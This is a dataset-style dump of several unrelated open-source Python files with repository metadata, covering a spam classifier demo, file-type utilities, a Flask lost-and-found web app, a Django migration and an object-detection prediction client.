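from hpOneView.resources.settings.backups import Backups

conn = connection('oneview.example.com')   # placeholder appliance address
backups = Backups(conn)
backups.create()                           # trigger a new appliance backup
print(backups.get_all())                   # list available backups
print(backups.get_config())                # current backup configuration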
| 1,895
| 748
| 23
|
4bc85f8092188613ab654a4c3765404fe3fb867c
| 672
|
py
|
Python
|
airbnb/system/region_revenue.py
|
mpresh/airbnb-tools
|
6f1884082e91ec810ea5667a1b2041ad246ebf7b
|
[
"MIT"
] | 1
|
2017-07-12T16:44:02.000Z
|
2017-07-12T16:44:02.000Z
|
airbnb/system/region_revenue.py
|
mpresh/airbnb-tools
|
6f1884082e91ec810ea5667a1b2041ad246ebf7b
|
[
"MIT"
] | null | null | null |
airbnb/system/region_revenue.py
|
mpresh/airbnb-tools
|
6f1884082e91ec810ea5667a1b2041ad246ebf7b
|
[
"MIT"
] | null | null | null |
import zipcodes
import listings
import bnbcalendar
import finance
from pprint import pprint
if __name__ == "__main__":
region_average_revenue(zipcodes.get_all_cape_cod_zip_codes)
| 33.6
| 80
| 0.733631
|
import zipcodes
import listings
import bnbcalendar
import finance
from pprint import pprint
def region_average_revenue(zipcodes_func, adults=16, state="MA"):
rooms = listings.get_all_listings(zipcodes_func, adults=adults, state=state)
#rooms = ["4914702", "16042826"]
for room in rooms:
print("Getting calendar for {}".format(room))
calendar = bnbcalendar.get_calendar_for_next_year(room, adults=adults-3)
total_revenue = finance.calculate_total_revenue(calendar)
print("listing {} revenue {}".format(room, total_revenue))
if __name__ == "__main__":
region_average_revenue(zipcodes.get_all_cape_cod_zip_codes)
| 455
| 0
| 23
|
2b4944225389f356c9da74143b2cea6864e7e5f4
| 2,458
|
py
|
Python
|
conveniences/demo_mnbc.py
|
mateusnbm/ai-conveniences
|
4a0cd0d761f1d534149f9f0ab03f5f94e4290580
|
[
"MIT"
] | null | null | null |
conveniences/demo_mnbc.py
|
mateusnbm/ai-conveniences
|
4a0cd0d761f1d534149f9f0ab03f5f94e4290580
|
[
"MIT"
] | null | null | null |
conveniences/demo_mnbc.py
|
mateusnbm/ai-conveniences
|
4a0cd0d761f1d534149f9f0ab03f5f94e4290580
|
[
"MIT"
] | null | null | null |
#
# demo_mnbc.py
#
# Multinomial Naive Bayes Classifier.
#
# Based-on:
#
# https://www.udemy.com/data-science-and-machine-learning-with-python-hands-on/
# http://blog.datumbox.com/machine-learning-tutorial-the-naive-bayes-text-classifier/
#
import os
import io
import numpy
from pandas import DataFrame
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.naive_bayes import MultinomialNB
'''
Convenience functions to read the emails and store their messages and
classes in a pandas dataframe.
'''
'''
Read the data and store it in a pandas dataframe.
'''
data = DataFrame({'message': [], 'class': []})
data = data.append(dataFrameFromDirectory('../datasets/emails/ham', 'ham'))
data = data.append(dataFrameFromDirectory('../datasets/emails/spam', 'spam'))
'''
We pass an array of messages to vectorizer.fit_transform(); it converts
each word to a global token and counts the occurrences across all emails.
'''
vectorizer = CountVectorizer()
counts = vectorizer.fit_transform(data['message'].values)
'''
Now we train a Multinomial Naive Bayes classifier using the frequencies
obtained in the last step. We use this variant of the algorithm because our
premise is that spam tends to contain certain words that readily give away
its nefarious purpose.
'''
classifier = MultinomialNB()
targets = data['class'].values
classifier.fit(counts, targets)
'''
Run some examples to test the classifier.
'''
examples = ['Free Viagra now!!!', "Hi Bob, how about a game of golf tomorrow?", "Luke... I'm your father."]
example_counts = vectorizer.transform(examples)
predictions = classifier.predict(example_counts)
print(predictions)
| 27.931818
| 107
| 0.684703
|
#
# demo_mnbc.py
#
# Multinomial Naive Bayes Classifier.
#
# Based-on:
#
# https://www.udemy.com/data-science-and-machine-learning-with-python-hands-on/
# http://blog.datumbox.com/machine-learning-tutorial-the-naive-bayes-text-classifier/
#
import os
import io
import numpy
from pandas import DataFrame
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.naive_bayes import MultinomialNB
'''
Convenience functions to read the emails and store their messages and
classes in a pandas dataframe.
'''
def readFiles(path):
for root, dirnames, filenames in os.walk(path):
for filename in filenames:
path = os.path.join(root, filename)
inBody = False
lines = []
f = io.open(path, 'r', encoding='latin1')
for line in f:
if inBody:
lines.append(line)
elif line == '\n':
inBody = True
f.close()
message = '\n'.join(lines)
yield path, message
def dataFrameFromDirectory(path, classification):
rows = []
index = []
for filename, message in readFiles(path):
rows.append({'message': message, 'class': classification})
index.append(filename)
return DataFrame(rows, index=index)
'''
Read the data and store it in a pandas dataframe.
'''
data = DataFrame({'message': [], 'class': []})
data = data.append(dataFrameFromDirectory('../datasets/emails/ham', 'ham'))
data = data.append(dataFrameFromDirectory('../datasets/emails/spam', 'spam'))
'''
We pass an array of messages to vectorizer.fit_transform(); it converts
each word to a global token and counts the occurrences across all emails.
'''
vectorizer = CountVectorizer()
counts = vectorizer.fit_transform(data['message'].values)
'''
Now we train a Multinomial Naive Bayes classifier using the frequencies
obtained in the last step. We use this variant of the algorithm because our
premise is that spam tends to contain certain words that readily give away
its nefarious purpose.
'''
classifier = MultinomialNB()
targets = data['class'].values
classifier.fit(counts, targets)
'''
Run some examples to test the classifier.
'''
examples = ['Free Viagra now!!!', "Hi Bob, how about a game of golf tomorrow?", "Luke... I'm your father."]
example_counts = vectorizer.transform(examples)
predictions = classifier.predict(example_counts)
print(predictions)
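An optional evaluation sketch (not part of the original script): hold out a slice of the data to estimate accuracy instead of relying on three hand-written examples.
from sklearn.model_selection import train_test_split

X_train, X_test, y_train, y_test = train_test_split(
    counts, targets, test_size=0.2, random_state=0)
held_out_clf = MultinomialNB().fit(X_train, y_train)
print('held-out accuracy:', held_out_clf.score(X_test, y_test))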
| 735
| 0
| 46
|
e5ab48881e462aa904536ebf91d486c500e7719a
| 115
|
py
|
Python
|
testing_focus_session/01_unit_tests/03_pytest/02_fixtures/05_request_fixture/test_module.py
|
netanelrevah/testing-focus-session
|
ce1ef76afa444ee50a1d20f0855ae5073ee2c2d9
|
[
"MIT"
] | 1
|
2020-06-26T12:40:38.000Z
|
2020-06-26T12:40:38.000Z
|
testing_focus_session/01_unit_tests/03_pytest/02_fixtures/05_request_fixture/test_module.py
|
netanelrevah/testing-focus-session
|
ce1ef76afa444ee50a1d20f0855ae5073ee2c2d9
|
[
"MIT"
] | null | null | null |
testing_focus_session/01_unit_tests/03_pytest/02_fixtures/05_request_fixture/test_module.py
|
netanelrevah/testing-focus-session
|
ce1ef76afa444ee50a1d20f0855ae5073ee2c2d9
|
[
"MIT"
] | 1
|
2021-10-05T10:29:19.000Z
|
2021-10-05T10:29:19.000Z
|
ports = [80, 433, 8080, 8000]
| 16.428571
| 34
| 0.652174
|
ports = [80, 433, 8080, 8000]
def test_connections(connections):
for c in connections:
print(c.port)
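The test above depends on a connections fixture defined elsewhere (presumably a conftest.py); a plausible sketch using the request fixture, which the lesson folder name points at, could look like the following. The real fixture body is an assumption.
import pytest


class Connection:
    """Minimal stand-in with just the attribute the test prints."""
    def __init__(self, port):
        self.port = port


@pytest.fixture
def connections(request):
    # request.module exposes the requesting test module, so the fixture can
    # reuse its module-level ``ports`` list.
    return [Connection(port) for port in request.module.ports]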
| 61
| 0
| 23
|
3f2201b86a9fcb9ecd7c3f12b0c04d9a9eeca535
| 6,660
|
py
|
Python
|
src/commoncode/filetype.py
|
Pratikrocks/commoncode
|
02fb544869708607997bbf3440e1b402c68a3164
|
[
"Apache-2.0"
] | 2
|
2020-09-28T10:12:28.000Z
|
2021-01-15T11:16:44.000Z
|
src/commoncode/filetype.py
|
Pratikrocks/commoncode
|
02fb544869708607997bbf3440e1b402c68a3164
|
[
"Apache-2.0"
] | 28
|
2020-11-13T01:39:37.000Z
|
2022-03-28T20:14:50.000Z
|
src/commoncode/filetype.py
|
Pratikrocks/commoncode
|
02fb544869708607997bbf3440e1b402c68a3164
|
[
"Apache-2.0"
] | 6
|
2020-11-18T00:16:18.000Z
|
2021-09-01T09:01:11.000Z
|
#
# Copyright (c) nexB Inc. and others. All rights reserved.
# SPDX-License-Identifier: Apache-2.0
# See http://www.apache.org/licenses/LICENSE-2.0 for the license text.
# See https://github.com/nexB/commoncode for support or download.
# See https://aboutcode.org for more information about nexB OSS projects.
#
import os
from datetime import datetime
from commoncode.system import on_posix
from commoncode.functional import memoize
"""
Low level file type utilities, essentially a wrapper around os.path and stat.
"""
def is_link(location):
"""
Return True if `location` is a symbolic link.
"""
return location and os.path.islink(location)
def is_file(location, follow_symlinks=False):
"""
Return True if `location` is a file.
"""
_is_file = location and os.path.isfile(location)
if follow_symlinks:
return _is_file
return _is_file and not is_link(location) and not is_broken_link(location)
def is_dir(location, follow_symlinks=False):
"""
Return True if `location` is a directory.
"""
_is_dir = location and os.path.isdir(location) and not is_file(location)
if follow_symlinks:
return _is_dir
return _is_dir and not is_link(location) and not is_broken_link(location)
def is_regular(location):
"""
Return True if `location` is regular. A regular location is a file or a
dir and not a special file or symlink.
"""
return location and (is_file(location) or is_dir(location))
def is_special(location):
"""
    Return True if `location` is a special file. A special file is not a
    regular file, i.e. anything such as a broken link, block file, fifo,
    socket, character device, and so on.
"""
return not is_regular(location)
def is_broken_link(location):
"""
Return True if `location` is a broken link.
"""
# always false on windows, until Python supports junctions/links
if on_posix and is_link(location):
target = get_link_target(location)
target_loc = os.path.join(os.path.dirname(location), target)
return target and not os.path.exists(target_loc)
def get_link_target(location):
"""
Return the link target for `location` if this is a Link or an empty
string.
"""
target = ''
# always false on windows, until Python supports junctions/links
if on_posix and is_link(location):
try:
# return false on OSes not supporting links
target = os.readlink(location)
except UnicodeEncodeError:
# location is unicode but readlink can fail in some cases
pass
return target
# Map of type checker function -> short type code
# The order of types check matters: link -> file -> directory -> special
TYPES = dict([
(is_link, ('l', 'link',)),
(is_file, ('f', 'file',)),
(is_dir, ('d', 'directory',)),
(is_special, ('s', 'special',))
])
def get_type(location, short=True):
"""
Return the type of the `location` or None if it does not exist.
Return the short form (single character) or long form if short=False
"""
if location:
for type_checker in TYPES:
tc = type_checker(location)
if tc:
short_form, long_form = TYPES[type_checker]
return short and short_form or long_form
def is_readable(location):
"""
Return True if the file at location has readable permission set.
Does not follow links.
"""
if location:
if is_dir(location):
return os.access(location, os.R_OK | os.X_OK)
else:
return os.access(location, os.R_OK)
def is_writable(location):
"""
Return True if the file at location has writeable permission set.
Does not follow links.
"""
if location:
if is_dir(location):
return os.access(location, os.R_OK | os.W_OK | os.X_OK)
else:
return os.access(location, os.R_OK | os.W_OK)
def is_executable(location):
"""
Return True if the file at location has executable permission set.
Does not follow links.
"""
if location:
if is_dir(location):
return os.access(location, os.R_OK | os.W_OK | os.X_OK)
else:
return os.access(location, os.X_OK)
def is_rwx(location):
"""
Return True if the file at location has read, write and executable
permission set. Does not follow links.
"""
return is_readable(location) and is_writable(location) and is_executable(location)
def get_last_modified_date(location):
"""
Return the last modified date stamp of a file as YYYYMMDD format. The date
of non-files (dir, links, special) is always an empty string.
"""
yyyymmdd = ''
if is_file(location):
utc_date = datetime.isoformat(
datetime.utcfromtimestamp(os.path.getmtime(location))
)
yyyymmdd = utc_date[:10]
return yyyymmdd
counting_functions = {
'file_count': lambda _: 1,
'file_size': os.path.getsize,
}
@memoize
def counter(location, counting_function):
"""
Return a count for a single file or a cumulative count for a directory
tree at `location`.
Get a callable from the counting_functions registry using the
`counting_function` string. Call this callable with a `location` argument
    to determine the count value for a single file. This allows memoization
with hashable arguments.
Only regular files and directories have a count. The count for a directory
is the recursive count sum of the directory file and directory
descendants.
Any other file type such as a special file or link has a zero size. Does
not follow links.
"""
if not (is_file(location) or is_dir(location)):
return 0
count = 0
if is_file(location):
count_fun = counting_functions[counting_function]
return count_fun(location)
elif is_dir(location):
count += sum(counter(os.path.join(location, p), counting_function)
for p in os.listdir(location))
return count
def get_file_count(location):
"""
Return the cumulative number of files in the directory tree at `location`
or 1 if `location` is a file. Only regular files are counted. Everything
else has a zero size.
"""
return counter(location, 'file_count')
def get_size(location):
"""
Return the size in bytes of a file at `location` or if `location` is a
directory, the cumulative size of all files in this directory tree. Only
regular files have a size. Everything else has a zero size.
"""
return counter(location, 'file_size')
| 29.469027
| 86
| 0.666066
|
#
# Copyright (c) nexB Inc. and others. All rights reserved.
# SPDX-License-Identifier: Apache-2.0
# See http://www.apache.org/licenses/LICENSE-2.0 for the license text.
# See https://github.com/nexB/commoncode for support or download.
# See https://aboutcode.org for more information about nexB OSS projects.
#
import os
from datetime import datetime
from commoncode.system import on_posix
from commoncode.functional import memoize
"""
Low level file type utilities, essentially a wrapper around os.path and stat.
"""
def is_link(location):
"""
Return True if `location` is a symbolic link.
"""
return location and os.path.islink(location)
def is_file(location, follow_symlinks=False):
"""
Return True if `location` is a file.
"""
_is_file = location and os.path.isfile(location)
if follow_symlinks:
return _is_file
return _is_file and not is_link(location) and not is_broken_link(location)
def is_dir(location, follow_symlinks=False):
"""
Return True if `location` is a directory.
"""
_is_dir = location and os.path.isdir(location) and not is_file(location)
if follow_symlinks:
return _is_dir
return _is_dir and not is_link(location) and not is_broken_link(location)
def is_regular(location):
"""
Return True if `location` is regular. A regular location is a file or a
dir and not a special file or symlink.
"""
return location and (is_file(location) or is_dir(location))
def is_special(location):
"""
    Return True if `location` is a special file. A special file is not a
    regular file, i.e. anything such as a broken link, block file, fifo,
    socket, character device, and so on.
"""
return not is_regular(location)
def is_broken_link(location):
"""
Return True if `location` is a broken link.
"""
# always false on windows, until Python supports junctions/links
if on_posix and is_link(location):
target = get_link_target(location)
target_loc = os.path.join(os.path.dirname(location), target)
return target and not os.path.exists(target_loc)
def get_link_target(location):
"""
Return the link target for `location` if this is a Link or an empty
string.
"""
target = ''
# always false on windows, until Python supports junctions/links
if on_posix and is_link(location):
try:
# return false on OSes not supporting links
target = os.readlink(location)
except UnicodeEncodeError:
# location is unicode but readlink can fail in some cases
pass
return target
# Map of type checker function -> short type code
# The order of types check matters: link -> file -> directory -> special
TYPES = dict([
(is_link, ('l', 'link',)),
(is_file, ('f', 'file',)),
(is_dir, ('d', 'directory',)),
(is_special, ('s', 'special',))
])
def get_type(location, short=True):
"""
Return the type of the `location` or None if it does not exist.
Return the short form (single character) or long form if short=False
"""
if location:
for type_checker in TYPES:
tc = type_checker(location)
if tc:
short_form, long_form = TYPES[type_checker]
return short and short_form or long_form
def is_readable(location):
"""
Return True if the file at location has readable permission set.
Does not follow links.
"""
if location:
if is_dir(location):
return os.access(location, os.R_OK | os.X_OK)
else:
return os.access(location, os.R_OK)
def is_writable(location):
"""
Return True if the file at location has writeable permission set.
Does not follow links.
"""
if location:
if is_dir(location):
return os.access(location, os.R_OK | os.W_OK | os.X_OK)
else:
return os.access(location, os.R_OK | os.W_OK)
def is_executable(location):
"""
Return True if the file at location has executable permission set.
Does not follow links.
"""
if location:
if is_dir(location):
return os.access(location, os.R_OK | os.W_OK | os.X_OK)
else:
return os.access(location, os.X_OK)
def is_rwx(location):
"""
Return True if the file at location has read, write and executable
permission set. Does not follow links.
"""
return is_readable(location) and is_writable(location) and is_executable(location)
def get_last_modified_date(location):
"""
Return the last modified date stamp of a file as YYYYMMDD format. The date
of non-files (dir, links, special) is always an empty string.
"""
yyyymmdd = ''
if is_file(location):
utc_date = datetime.isoformat(
datetime.utcfromtimestamp(os.path.getmtime(location))
)
yyyymmdd = utc_date[:10]
return yyyymmdd
counting_functions = {
'file_count': lambda _: 1,
'file_size': os.path.getsize,
}
@memoize
def counter(location, counting_function):
"""
Return a count for a single file or a cumulative count for a directory
tree at `location`.
Get a callable from the counting_functions registry using the
`counting_function` string. Call this callable with a `location` argument
    to determine the count value for a single file. This allows memoization
with hashable arguments.
Only regular files and directories have a count. The count for a directory
is the recursive count sum of the directory file and directory
descendants.
Any other file type such as a special file or link has a zero size. Does
not follow links.
"""
if not (is_file(location) or is_dir(location)):
return 0
count = 0
if is_file(location):
count_fun = counting_functions[counting_function]
return count_fun(location)
elif is_dir(location):
count += sum(counter(os.path.join(location, p), counting_function)
for p in os.listdir(location))
return count
def get_file_count(location):
"""
Return the cumulative number of files in the directory tree at `location`
or 1 if `location` is a file. Only regular files are counted. Everything
else has a zero size.
"""
return counter(location, 'file_count')
def get_size(location):
"""
Return the size in bytes of a file at `location` or if `location` is a
directory, the cumulative size of all files in this directory tree. Only
regular files have a size. Everything else has a zero size.
"""
return counter(location, 'file_size')
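A quick, hedged usage sketch of the helpers above; the paths are placeholders.
if __name__ == '__main__':
    print(get_type('.', short=False))                    # e.g. 'directory'
    print(get_file_count('.'), 'files,', get_size('.'), 'bytes')
    print(get_last_modified_date(__file__) or '(not a regular file)')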
| 0
| 0
| 0
|
05aeadad29492f4792dc64b4e5f1e4699b3a1866
| 1,522
|
py
|
Python
|
object_detection/serving_script/predict.py
|
qq2016/kubeflow_learning
|
930706686108f997aab42ccf2fe455dcf09a4afc
|
[
"Apache-2.0"
] | 1,165
|
2018-03-01T01:47:14.000Z
|
2022-03-31T08:35:00.000Z
|
object_detection/serving_script/predict.py
|
arki1/examples
|
c93b792d67c8c52bc91d4ccf5fbaead4e2324331
|
[
"Apache-2.0"
] | 929
|
2018-02-04T18:20:16.000Z
|
2022-03-31T18:20:43.000Z
|
object_detection/serving_script/predict.py
|
arki1/examples
|
c93b792d67c8c52bc91d4ccf5fbaead4e2324331
|
[
"Apache-2.0"
] | 687
|
2018-02-01T21:35:30.000Z
|
2022-03-29T07:47:47.000Z
|
""" Script to send prediction request.
Usage:
python predict.py --url=YOUR_KF_HOST/models/coco --input_image=YOUR_LOCAL_IMAGE
--output_image=OUTPUT_IMAGE_NAME.
This will save the prediction result as OUTPUT_IMAGE_NAME.
The output image is the input image with the detected bounding boxes.
"""
import argparse
import json
import requests
import numpy as np
from PIL import Image
import visualization_utils as vis_util
WIDTH = 1024
HEIGHT = 768
if __name__ == '__main__':
main()
| 27.178571
| 81
| 0.729304
|
""" Script to send prediction request.
Usage:
python predict.py --url=YOUR_KF_HOST/models/coco --input_image=YOUR_LOCAL_IMAGE
--output_image=OUTPUT_IMAGE_NAME.
This will save the prediction result as OUTPUT_IMAGE_NAME.
The output image is the input image with the detected bounding boxes.
"""
import argparse
import json
import requests
import numpy as np
from PIL import Image
import visualization_utils as vis_util
WIDTH = 1024
HEIGHT = 768
def main():
parser = argparse.ArgumentParser()
parser.add_argument("--url", help='The url to send the request')
parser.add_argument("--input_image", default='image1.jpg')
parser.add_argument("--output_image", default='output.jpg')
args = parser.parse_args()
img = Image.open(args.input_image)
img = img.resize((WIDTH, HEIGHT), Image.ANTIALIAS)
img_np = np.array(img)
res = requests.post(
args.url,
data=json.dumps({"instances": [{"inputs": img_np.tolist()}]}))
if res.status_code != 200:
print('Failed: {}'.format(res.text))
return
output_dict = json.loads(res.text).get('predictions')[0]
vis_util.visualize_boxes_and_labels_on_image_array(
img_np,
np.array(output_dict['detection_boxes']),
map(int, output_dict['detection_classes']),
output_dict['detection_scores'],
{},
instance_masks=output_dict.get('detection_masks'),
use_normalized_coordinates=True,
line_thickness=8)
output_image = Image.fromarray(img_np)
output_image.save(args.output_image)
if __name__ == '__main__':
main()
| 1,009
| 0
| 23
|
835a69e7ee6ae96c62b6be6b24e176d61f9beb24
| 151
|
py
|
Python
|
src/polls/tests/functional_tests.py
|
ikos289/docker-django
|
6fa50df751e357b82b686d15b16891210e506430
|
[
"MIT"
] | null | null | null |
src/polls/tests/functional_tests.py
|
ikos289/docker-django
|
6fa50df751e357b82b686d15b16891210e506430
|
[
"MIT"
] | null | null | null |
src/polls/tests/functional_tests.py
|
ikos289/docker-django
|
6fa50df751e357b82b686d15b16891210e506430
|
[
"MIT"
] | null | null | null |
from selenium import webdriver
browser = webdriver.Firefox()
browser.get('http://0.0.0.0:8000')
print(browser.title)
assert 'Django' in browser.title
| 21.571429
| 34
| 0.761589
|
from selenium import webdriver
browser = webdriver.Firefox()
browser.get('http://0.0.0.0:8000')
print(browser.title)
assert 'Django' in browser.title
| 0
| 0
| 0
|
a72428b374da27389d79bf99ef277a86b1fa5dd6
| 509
|
py
|
Python
|
src/olympia/stats/migrations/0005_create_switch_bigquery_download_stats_cron_tasks.py
|
shashwatsingh/addons-server
|
8fce98901104349055a828b5a47865f5e8f4120b
|
[
"BSD-3-Clause"
] | 843
|
2016-02-09T13:00:37.000Z
|
2022-03-20T19:17:06.000Z
|
src/olympia/stats/migrations/0005_create_switch_bigquery_download_stats_cron_tasks.py
|
shashwatsingh/addons-server
|
8fce98901104349055a828b5a47865f5e8f4120b
|
[
"BSD-3-Clause"
] | 10,187
|
2016-02-05T23:51:05.000Z
|
2022-03-31T15:24:44.000Z
|
src/olympia/stats/migrations/0005_create_switch_bigquery_download_stats_cron_tasks.py
|
shashwatsingh/addons-server
|
8fce98901104349055a828b5a47865f5e8f4120b
|
[
"BSD-3-Clause"
] | 551
|
2016-02-08T20:32:16.000Z
|
2022-03-15T16:49:24.000Z
|
# Generated by Django 2.2.13 on 2020-07-23 16:13
from django.db import migrations
| 25.45
| 61
| 0.707269
|
# Generated by Django 2.2.13 on 2020-07-23 16:13
from django.db import migrations
def create_waffle_switch(apps, schema_editor):
Switch = apps.get_model('waffle', 'Switch')
Switch.objects.create(
name='use-bigquery-for-download-stats-cron',
active=False,
note='Use BigQuery in download stats cron tasks',
)
class Migration(migrations.Migration):
dependencies = [('stats', '0004_delete_updatecount')]
operations = [migrations.RunPython(create_waffle_switch)]
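As written, the RunPython operation has no reverse function, so the migration cannot be rolled back cleanly; a hedged variant that tolerates reversal could look like this (not part of the original file).
class Migration(migrations.Migration):
    dependencies = [('stats', '0004_delete_updatecount')]
    operations = [
        # no-op on reverse so `migrate stats 0004` does not raise
        migrations.RunPython(create_waffle_switch, migrations.RunPython.noop),
    ]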
| 239
| 139
| 46
|
800e3537aea3f08140b4b85867fd724bf0b52669
| 1,055
|
py
|
Python
|
mmaction/models/losses/__init__.py
|
ovshake/mmaction2
|
71e92e9d4c28190d485ba153aae5200bf71f70b1
|
[
"Apache-2.0"
] | null | null | null |
mmaction/models/losses/__init__.py
|
ovshake/mmaction2
|
71e92e9d4c28190d485ba153aae5200bf71f70b1
|
[
"Apache-2.0"
] | null | null | null |
mmaction/models/losses/__init__.py
|
ovshake/mmaction2
|
71e92e9d4c28190d485ba153aae5200bf71f70b1
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) OpenMMLab. All rights reserved.
from .base import BaseWeightedLoss
from .binary_logistic_regression_loss import BinaryLogisticRegressionLoss
from .bmn_loss import BMNLoss
from .cross_entropy_loss import BCELossWithLogits, CrossEntropyLoss
from .hvu_loss import HVULoss
from .nll_loss import NLLLoss
from .ohem_hinge_loss import OHEMHingeLoss
from .ssn_loss import SSNLoss
from .slowfast_selfsupervised_loss import SlowFastSelfSupervisedLoss, ContrastiveLoss, SingleInstanceContrastiveLoss, SingleInstanceContrastiveLossv2
from .multiple_contrastive_loss import MultipleContrastiveLoss, MultipleContrastiveSingleInstanceLoss
from .moco_loss import MocoLoss
__all__ = [
'BaseWeightedLoss', 'CrossEntropyLoss', 'NLLLoss', 'BCELossWithLogits',
'BinaryLogisticRegressionLoss', 'BMNLoss', 'OHEMHingeLoss', 'SSNLoss',
'HVULoss', 'SlowFastSelfSupervisedLoss', 'MultipleContrastiveLoss',
'ContrastiveLoss', 'MocoLoss', 'SingleInstanceContrastiveLoss', 'MultipleContrastiveSingleInstanceLoss', 'SingleInstanceContrastiveLossv2'
]
| 50.238095
| 149
| 0.842654
|
# Copyright (c) OpenMMLab. All rights reserved.
from .base import BaseWeightedLoss
from .binary_logistic_regression_loss import BinaryLogisticRegressionLoss
from .bmn_loss import BMNLoss
from .cross_entropy_loss import BCELossWithLogits, CrossEntropyLoss
from .hvu_loss import HVULoss
from .nll_loss import NLLLoss
from .ohem_hinge_loss import OHEMHingeLoss
from .ssn_loss import SSNLoss
from .slowfast_selfsupervised_loss import SlowFastSelfSupervisedLoss, ContrastiveLoss, SingleInstanceContrastiveLoss, SingleInstanceContrastiveLossv2
from .multiple_contrastive_loss import MultipleContrastiveLoss, MultipleContrastiveSingleInstanceLoss
from .moco_loss import MocoLoss
__all__ = [
'BaseWeightedLoss', 'CrossEntropyLoss', 'NLLLoss', 'BCELossWithLogits',
'BinaryLogisticRegressionLoss', 'BMNLoss', 'OHEMHingeLoss', 'SSNLoss',
'HVULoss', 'SlowFastSelfSupervisedLoss', 'MultipleContrastiveLoss',
'ContrastiveLoss', 'MocoLoss', 'SingleInstanceContrastiveLoss', 'MultipleContrastiveSingleInstanceLoss', 'SingleInstanceContrastiveLossv2'
]
| 0
| 0
| 0
|
77675869986e0085d26d2e304c0a479a6582a179
| 4,449
|
py
|
Python
|
app/__init__.py
|
IEEEComputerSocietyUNB/app-perdidos
|
92497b876b5eef874b390ace926c222155e9ceec
|
[
"MIT"
] | null | null | null |
app/__init__.py
|
IEEEComputerSocietyUNB/app-perdidos
|
92497b876b5eef874b390ace926c222155e9ceec
|
[
"MIT"
] | 13
|
2021-03-14T17:21:09.000Z
|
2021-03-14T17:56:03.000Z
|
app/__init__.py
|
IEEEComputerSocietyUNB/app-perdidos
|
92497b876b5eef874b390ace926c222155e9ceec
|
[
"MIT"
] | null | null | null |
from flask import Flask, render_template, url_for, request, redirect, send_from_directory, session, flash
from functools import wraps
from .db import init_db
from .models.object import Object
from .controllers.object import ObjectController
from .controllers.user import UserController
from flask import jsonify
| 26.963636
| 105
| 0.612272
|
from flask import Flask, render_template, url_for, request, redirect, send_from_directory, session, flash
from functools import wraps
from .db import init_db
from .models.object import Object
from .controllers.object import ObjectController
from .controllers.user import UserController
from flask import jsonify
def create_app(test_config=None):
app = Flask(__name__, instance_relative_config=True)
app.config.from_mapping(
SECRET_KEY='dev',
UPLOAD_FOLDER='/var/www/uploads'
)
from . import database
database.init_app(app)
def is_logged_in(f):
@wraps(f)
def wrap(*args, **kwargs):
if 'logged_in' in session:
return f(*args, **kwargs)
else:
flash('Nao autorizado, faça o login', 'perigo')
return redirect(url_for('login'))
return wrap
@app.route('/')
def hello():
init_db()
UserController.fill_table()
ObjectController.fill_table()
return redirect(url_for('view_objects'))
@app.route('/users/view', methods=['GET'])
@is_logged_in
def profile():
objs = ObjectController.get_objects_of_user(session['id'])
return render_template('profile/index.html', objs=objs)
@app.route('/objects/create', methods=['GET', 'POST'])
@is_logged_in
def create_object():
if request.method == 'GET':
return render_template('registerObject/index.html')
else:
ObjectController.create(request)
return redirect(url_for('view_objects'))
@app.route('/objects/view', methods=['GET'])
def view_objects():
objs = ObjectController.get_objects()
return render_template('showCase/index.html', objs=objs)
@app.route('/objects/view/<id>', methods=['GET'])
def view_object(id):
obj = ObjectController.get_object(id)
user = UserController.get_user(obj.user_id)
return render_template('objectDetails/index.html', obj=obj, user=user)
@app.route('/objects/update/<id>', methods=['GET', 'POST'])
@is_logged_in
def update_object(id):
obj = ObjectController.get_object(id)
if session['id'] == obj.user_id:
if request.method == 'GET':
return render_template('registerObject/index.html', obj=obj)
else:
obj = ObjectController.update(id, request)
return redirect(url_for('profile'))
else:
return redirect(url_for('profile'))
@app.route('/objects/delete/<id>', methods=['GET'])
@is_logged_in
def delete_object(id):
obj = ObjectController.get_object(id)
if session['id'] == obj.user_id:
obj = ObjectController.delete(id)
return redirect(url_for('profile'))
@app.route('/login', methods=['GET', 'POST'])
def login():
if request.method == 'POST':
UserController.login(request)
return redirect(url_for('view_objects'))
return render_template('login/index.html')
@app.route('/logout')
@is_logged_in
def logout():
UserController.logout()
return redirect(url_for('view_objects'))
@app.route('/signup', methods=['GET', 'POST'])
def signup():
if request.method == 'POST':
UserController.create(request)
return redirect(url_for('login'))
return render_template('signUp/index.html')
@app.route('/objects', methods=['GET', 'POST'])
def json_objects_get_or_create():
if request.method == 'POST':
return ObjectController.create(request)
objs = ObjectController.get_objects()
return jsonify(eqtls=[obj.serialize() for obj in objs])
@app.route('/objects/<int:id>', methods=['PUT', 'DELETE'])
def json_object_get_or_update_or_delete(id):
if request.method == 'DELETE':
result = ObjectController.delete(id)
return jsonify(status='success')
else:
return ObjectController.update(id, request)
@app.route('/db_test')
@is_logged_in
def db_test():
database.init_db()
return 'Banco de dados inicializado com sucesso!'
@app.route('/uploads/<filename>')
def upload(filename):
return send_from_directory(app.config['UPLOAD_FOLDER'], filename)
return app
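A brief usage sketch for the application factory above (not part of the original file), assuming the create_app defined here: it builds the app and hits the public showcase route with Flask's built-in test client; the expected status code assumes the database is reachable.

if __name__ == "__main__":
    app = create_app()
    with app.test_client() as client:
        response = client.get("/objects/view")  # public route, no login required
        print(response.status_code)             # 200 expected once the database is initialized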
| 4,115
| 0
| 23
|
77e0586d04fc6b5bd498ff7eda396fdc0f889dc1
| 96
|
py
|
Python
|
venv/lib/python3.8/site-packages/poetry/utils/password_manager.py
|
Retraces/UkraineBot
|
3d5d7f8aaa58fa0cb8b98733b8808e5dfbdb8b71
|
[
"MIT"
] | 2
|
2022-03-13T01:58:52.000Z
|
2022-03-31T06:07:54.000Z
|
venv/lib/python3.8/site-packages/poetry/utils/password_manager.py
|
DesmoSearch/Desmobot
|
b70b45df3485351f471080deb5c785c4bc5c4beb
|
[
"MIT"
] | 19
|
2021-11-20T04:09:18.000Z
|
2022-03-23T15:05:55.000Z
|
venv/lib/python3.8/site-packages/poetry/utils/password_manager.py
|
DesmoSearch/Desmobot
|
b70b45df3485351f471080deb5c785c4bc5c4beb
|
[
"MIT"
] | null | null | null |
/home/runner/.cache/pip/pool/3a/e8/d9/6b866f26f3d0047a518cb59b619be509f29a97d30cbaa9657343abd771
| 96
| 96
| 0.895833
|
/home/runner/.cache/pip/pool/3a/e8/d9/6b866f26f3d0047a518cb59b619be509f29a97d30cbaa9657343abd771
| 0
| 0
| 0
|
b7060bcb1857418d2ea9deaaa1621e5bdb64a900
| 25,094
|
py
|
Python
|
